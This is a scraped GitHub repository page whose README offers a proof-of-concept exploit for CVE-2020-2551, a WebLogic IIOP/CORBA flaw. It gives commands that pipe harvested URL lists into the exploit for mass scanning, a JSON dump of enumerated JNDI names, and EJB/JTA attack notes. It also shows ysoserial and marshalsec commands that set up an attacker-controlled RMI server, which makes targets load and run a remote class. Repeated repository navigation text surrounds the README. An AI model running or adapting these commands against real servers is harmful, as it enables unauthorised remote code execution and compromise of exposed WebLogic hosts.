1、CVE-2020-2551

CVE-2020-2551 poc exploit python example keys: GIOP corba

How use

python3 CVE-2020-2551.py -u http://192.168.26.79:7001
cat urls.txt|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
cat xxx.html|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
# 32 Thread check
cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e
# now result to data/*.txt
java -cp hktalent_51pwn_com_12.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
java -cp hktalent_51pwn_com_12.2.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port

t3, t3s, http, https, iiop, iiops

service:jmx:rmi://ip:port/jndi/iiop://ip:port/MBean-server-JNDI-name
service:jmx:iiop://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
service:jmx:t3://ip:port/jndi/weblogic.management.mbeanservers.domainruntime

poc

2、your know your do

{
    "ejb": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "interfaces": [
            "javax.naming.Context"
        ],
        "mgmt": {
            "MEJB": {
                "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
                "interfaces": []
            },
            "class": "com.sun.jndi.cosnaming.CNCtx",
            "interfaces": [
                "javax.naming.Context"
            ]
        }
    },
    "javax": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "error msg": "org.omg.CORBA.NO_PERMISSION:   vmcid: 0x0  minor code: 0  completed: No",
        "interfaces": [
            "javax.naming.Context"
        ]
    },
    "jdbc": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "db_xf": {
            "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
            "interfaces": []
        },
        "interfaces": [
            "javax.naming.Context"
        ]
    },
    "mejbmejb_jarMejb_EO": {
        "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
        "interfaces": []
    },
    "weblogic": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "error msg": "org.omg.CORBA.NO_PERMISSION:   vmcid: 0x0  minor code: 0  completed: No",
        "interfaces": [
            "javax.naming.Context"
        ]
    }
}

3、ejb

/bea_wls_internal/classes/mejb@/

weblogic.management.j2ee.mejb.Mejb_dj*#remove(Object obj)

4、jta

x.lookup("ejb/mgmt/MEJB").remove(jta);

5、logs

fix rmi use Jdk7u21 payload，not work for remote jdk8 don‘t use

java -cp $mtx/../tools/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 'whoami'

use,XXclass.class from jdk6 build

java -cp $mtx/../tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer 'http://YourIP:port/#XXclass' 1099

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
CVE-2020-2551.py		CVE-2020-2551.py
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2020-2551.py

CVE-2020-2551.py

README.md

README.md

Repository files navigation

1、CVE-2020-2551

How use

t3, t3s, http, https, iiop, iiops

poc

2、your know your do

3、ejb

4、jta

5、logs

About

Releases

Packages

Languages

0xAbbarhSF/CVE-Exploit

Folders and files

Latest commit

History

CVE-2020-2551.py

CVE-2020-2551.py

README.md

README.md

Repository files navigation

1、CVE-2020-2551

How use

t3, t3s, http, https, iiop, iiops

poc

2、your know your do

3、ejb

4、jta

5、logs

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages